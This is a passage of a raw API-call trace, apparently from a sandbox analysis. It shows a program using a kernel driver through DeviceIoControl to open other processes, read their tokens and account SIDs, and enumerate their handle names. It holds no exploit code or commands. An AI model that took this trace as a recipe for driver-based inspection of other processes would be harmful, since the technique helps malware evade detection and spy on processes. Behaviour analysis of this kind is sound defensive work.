ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.478] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xf [0227.478] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.478] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0227.478] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.478] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.478] PsLookupProcessByProcessId (in: ProcessId=0xa38, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.478] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.478] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.479] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.479] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.479] PsLookupProcessByProcessId (in: ProcessId=0xa38, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.479] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.479] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.479] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.479] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.479] PsLookupProcessByProcessId (in: ProcessId=0xa38, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.479] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.479] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x708) returned 0x0 [0227.479] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.479] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.479] PsLookupProcessByProcessId (in: ProcessId=0x708, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.479] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.479] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.479] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.479] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.479] PsLookupProcessByProcessId (in: ProcessId=0x708, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.479] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.479] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.479] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.479] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.479] PsLookupProcessByProcessId (in: ProcessId=0x708, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.479] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.479] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa24) returned 0xc8 [0227.480] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0227.480] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80028f3060, HandleInformation=0x0) returned 0x0 [0227.480] ObOpenObjectByPointer (in: Object=0xfffffa80028f3060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0227.480] ObfDereferenceObject (Object=0xfffffa80028f3060) returned 0x25 [0227.480] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa8002195c80 | out: TokenHandle=0xfffffa8002195c80*=0xc4) returned 0x0 [0227.480] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0227.480] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.480] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0227.480] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0227.482] CloseHandle (hObject=0xc4) returned 1 [0227.482] CloseHandle (hObject=0xc8) returned 1 [0227.482] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.482] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0227.482] PsLookupProcessByProcessId (in: ProcessId=0xa24, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.482] PsAcquireProcessExitSynchronization () returned 0x0 [0227.482] KeStackAttachProcess (in: PROCESS=0xfffffa80028f3060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80028f3060, ApcState=0xfffff880052b35d0) [0227.482] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80032516f0, HandleInformation=0x0) returned 0x0 [0227.482] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.482] PsReleaseProcessExitSynchronization () returned 0x2 [0227.482] ObfDereferenceObject (Object=0xfffffa80028f3060) returned 0x23 [0227.482] ObQueryNameString (in: Object=0xfffffa8007bffb50, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.482] ObfDereferenceObject (Object=0xfffffa80032516f0) returned 0x3 [0227.482] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.483] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.483] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.483] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0227.483] PsLookupProcessByProcessId (in: ProcessId=0xa24, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.483] PsAcquireProcessExitSynchronization () returned 0x0 [0227.483] KeStackAttachProcess (in: PROCESS=0xfffffa80028f3060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80028f3060, ApcState=0xfffff880052b35d0) [0227.483] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80022ddf20, HandleInformation=0x0) returned 0x0 [0227.483] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.483] PsReleaseProcessExitSynchronization () returned 0x2 [0227.483] ObfDereferenceObject (Object=0xfffffa80028f3060) returned 0x23 [0227.483] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.483] ObfDereferenceObject (Object=0xfffffa80022ddf20) returned 0x1 [0227.483] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.483] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.483] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.483] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x114, lpOverlapped=0x0) returned 1 [0227.483] PsLookupProcessByProcessId (in: ProcessId=0xa24, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.483] PsAcquireProcessExitSynchronization () returned 0x0 [0227.483] KeStackAttachProcess (in: PROCESS=0xfffffa80028f3060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80028f3060, ApcState=0xfffff880052b35d0) [0227.484] ObReferenceObjectByHandle (in: Handle=0x20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003172650, HandleInformation=0x0) returned 0x0 [0227.484] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.484] PsReleaseProcessExitSynchronization () returned 0x2 [0227.484] ObfDereferenceObject (Object=0xfffffa80028f3060) returned 0x23 [0227.484] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.484] ObfDereferenceObject (Object=0xfffffa8003172650) returned 0x1 [0227.484] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.484] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.484] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.484] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x2e, lpOverlapped=0x0) returned 1 [0227.484] PsLookupProcessByProcessId (in: ProcessId=0xa24, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.484] PsAcquireProcessExitSynchronization () returned 0x0 [0227.484] KeStackAttachProcess (in: PROCESS=0xfffffa80028f3060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80028f3060, ApcState=0xfffff880052b35d0) [0227.484] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800286faf0, HandleInformation=0x0) returned 0x0 [0227.484] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.484] PsReleaseProcessExitSynchronization () returned 0x2 [0227.484] ObfDereferenceObject (Object=0xfffffa80028f3060) returned 0x23 [0227.484] ObQueryNameString (in: Object=0xfffffa80019e2370, ObjectNameInfo=0xfffffa800315a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800315a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.484] ObfDereferenceObject (Object=0xfffffa800286faf0) returned 0x3 [0227.484] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.485] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa20) returned 0xc8 [0227.485] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0227.485] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8003195b30, HandleInformation=0x0) returned 0x0 [0227.485] ObOpenObjectByPointer (in: Object=0xfffffa8003195b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0227.485] ObfDereferenceObject (Object=0xfffffa8003195b30) returned 0x1c [0227.485] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa8002195c80 | out: TokenHandle=0xfffffa8002195c80*=0xc4) returned 0x0 [0227.485] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0227.485] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.485] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0227.485] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0227.487] CloseHandle (hObject=0xc4) returned 1 [0227.487] CloseHandle (hObject=0xc8) returned 1 [0227.487] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.487] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.487] PsLookupProcessByProcessId (in: ProcessId=0xa20, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.487] PsAcquireProcessExitSynchronization () returned 0x0 [0227.487] KeStackAttachProcess (in: PROCESS=0xfffffa8003195b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003195b30, ApcState=0xfffff880052b35d0) [0227.487] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80024af510, HandleInformation=0x0) returned 0x0 [0227.487] ObfDereferenceObject (Object=0xfffffa80024af510) returned 0x1 [0227.487] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.487] PsReleaseProcessExitSynchronization () returned 0x2 [0227.487] ObfDereferenceObject (Object=0xfffffa8003195b30) returned 0x1a [0227.487] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.487] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.487] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.487] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.487] PsLookupProcessByProcessId (in: ProcessId=0xa20, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.487] PsAcquireProcessExitSynchronization () returned 0x0 [0227.487] KeStackAttachProcess (in: PROCESS=0xfffffa8003195b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003195b30, ApcState=0xfffff880052b35d0) [0227.487] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80030cbb70, HandleInformation=0x0) returned 0x0 [0227.487] ObfDereferenceObject (Object=0xfffffa80030cbb70) returned 0x1 [0227.487] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.487] PsReleaseProcessExitSynchronization () returned 0x2 [0227.488] ObfDereferenceObject (Object=0xfffffa8003195b30) returned 0x1a [0227.488] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.488] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.488] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.488] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.488] PsLookupProcessByProcessId (in: ProcessId=0xa20, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.488] PsAcquireProcessExitSynchronization () returned 0x0 [0227.488] KeStackAttachProcess (in: PROCESS=0xfffffa8003195b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003195b30, ApcState=0xfffff880052b35d0) [0227.488] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80026484e0, HandleInformation=0x0) returned 0x0 [0227.488] ObfDereferenceObject (Object=0xfffffa80026484e0) returned 0x2 [0227.488] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.488] PsReleaseProcessExitSynchronization () returned 0x2 [0227.488] ObfDereferenceObject (Object=0xfffffa8003195b30) returned 0x1a [0227.488] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.488] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x78c) returned 0x0 [0227.488] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.488] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.488] PsLookupProcessByProcessId (in: ProcessId=0x78c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.488] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.488] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.488] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.488] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.488] PsLookupProcessByProcessId (in: ProcessId=0x78c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.488] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.488] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.489] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.489] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.489] PsLookupProcessByProcessId (in: ProcessId=0x78c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.489] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.489] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x494) returned 0xc8 [0227.489] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0227.489] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8003191b30, HandleInformation=0x0) returned 0x0 [0227.489] ObOpenObjectByPointer (in: Object=0xfffffa8003191b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0227.490] ObfDereferenceObject (Object=0xfffffa8003191b30) returned 0xf [0227.490] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa8002195c80 | out: TokenHandle=0xfffffa8002195c80*=0xc4) returned 0x0 [0227.490] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0227.490] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.490] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0227.490] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0227.492] CloseHandle (hObject=0xc4) returned 1 [0227.492] CloseHandle (hObject=0xc8) returned 1 [0227.492] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.492] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0227.492] PsLookupProcessByProcessId (in: ProcessId=0x494, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.493] PsAcquireProcessExitSynchronization () returned 0x0 [0227.493] KeStackAttachProcess (in: PROCESS=0xfffffa8003191b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003191b30, ApcState=0xfffff880052b35d0) [0227.493] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80030a7700, HandleInformation=0x0) returned 0x0 [0227.493] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.493] PsReleaseProcessExitSynchronization () returned 0x2 [0227.493] ObfDereferenceObject (Object=0xfffffa8003191b30) returned 0xd [0227.493] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.493] ObfDereferenceObject (Object=0xfffffa80030a7700) returned 0x1 